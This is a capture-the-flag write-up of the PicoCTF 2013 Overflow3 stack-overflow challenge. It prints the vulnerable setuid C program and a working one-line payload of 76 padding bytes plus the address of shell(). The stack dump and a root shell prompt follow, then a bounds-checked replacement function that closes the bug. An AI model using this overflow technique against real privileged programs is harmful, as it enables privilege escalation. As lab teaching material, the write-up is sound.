PicoCTF2013 Overflow3 Writeup



Category: Binary Exploitation
Points: 120
Description:

Stack overflows are the most basic binary exploitation technique, but they take a lot of skill to master. If you already know some C, these problems can help acquaint you with stacks and binary exploitation in general.
Problem available on the shell machine in /problems/stack_overflow_3_28d8a442fb232c0c , downloadable here with source here.
If you solve the problem you will be able to read the key file by running
cat /problems/stack_overflow_3_28d8a442fb232c0c/key on the PicoCTF shell machine.
Hint: objdump -d is a handy tool for this sort of thing.


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"   /* challenge-provided helper that prints the stack */

/*
 * Goal: Get the program to run this function.
 */
void shell(void) {
    execl("/bin/sh", "sh", NULL);
}

/* Copies the argument into a 64-byte stack buffer with no length check. */
void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 21, (void **) &str);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: buffer_overflow [str]\n");
        return 1;
    }

    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    printf("shell function = %p\n", shell);
    vuln(argv[1]);   /* call missing from the pasted source; restored from the program's output below */
    return 0;
}

Run the program once to find the address of the shell function. (Run it a second time as well, to confirm that the address does not change between runs.) Then overwrite the return address with it to get a shell.

# ./overflow3-28d8a442fb232c0c a
shell function = 0x80485f8

# ./overflow3-28d8a442fb232c0c $(python -c 'import sys; sys.stdout.write("A"*76); sys.stdout.write("\xf8\x85\x04\x08")')
shell function = 0x80485f8
Stack dump:
0xffc05510: 0xffc06700 (first argument)
0xffc0550c: 0x080485f8 (saved eip)
0xffc05508: 0x41414141 (saved ebp)
0xffc05504: 0x41414141
0xffc05500: 0x41414141
0xffc054fc: 0x41414141
0xffc054f8: 0x41414141
0xffc054f4: 0x41414141
0xffc054f0: 0x41414141
0xffc054ec: 0x41414141
0xffc054e8: 0x41414141
0xffc054e4: 0x41414141
0xffc054e0: 0x41414141
0xffc054dc: 0x41414141
0xffc054d8: 0x41414141
0xffc054d4: 0x41414141
0xffc054d0: 0x41414141
0xffc054cc: 0x41414141
0xffc054c8: 0x41414141
0xffc054c4: 0x41414141
0xffc054c0: 0x41414141 (beginning of buffer)
sh-4.2# ls
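The stack dump above shows the saved eip sitting 76 bytes past the start of the 64-byte buffer, so any input longer than 63 characters already starts clobbering the frame. As an added example (not part of the challenge source), this is the bounded replacement for vuln() that closes the bug: the copy only happens when the whole input, terminating NUL included, fits; memchr() is used as the bounded scan, and BUF_SIZE is assumed to match the challenge's buf[64].

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* assumed: same size as buf[] in the challenge's vuln() */

/*
 * Hardened replacement for vuln(). strcpy() in the original keeps writing past
 * the 64 bytes, which is how the saved ebp (+72) and saved eip (+76) shown in
 * the dump get overwritten. Here the copy is performed only when the input,
 * terminating NUL included, fits in buf.
 * Returns 0 when the input was copied, -1 when it was rejected.
 */
int vuln_safe(const char *str) {
    char buf[BUF_SIZE];
    /* memchr() bounds the scan to BUF_SIZE bytes, so even an unterminated
       input cannot make us read further than the buffer we are sizing for. */
    const char *nul = memchr(str, '\0', BUF_SIZE);
    if (nul == NULL) {
        fprintf(stderr, "rejected: input needs more than %d bytes\n", BUF_SIZE);
        return -1;
    }
    size_t len = (size_t)(nul - str);
    memcpy(buf, str, len + 1);   /* len + 1 <= BUF_SIZE by construction */
    printf("copied %zu bytes into a %d-byte buffer\n", len, BUF_SIZE);
    return 0;
}

int main(void) {
    /* Constructed inputs: one that just fits, one the length of the writeup's padding. */
    char fits[BUF_SIZE];
    char too_long[76 + 1];
    memset(fits, 'A', BUF_SIZE - 1);
    fits[BUF_SIZE - 1] = '\0';
    memset(too_long, 'A', 76);
    too_long[76] = '\0';
    vuln_safe(fits);       /* copied: 63 bytes plus NUL */
    vuln_safe(too_long);   /* rejected before any byte reaches buf */
    return 0;
}
```

Building the original with -fstack-protector would additionally detect the overwrite at runtime, but the length check is what removes the bug.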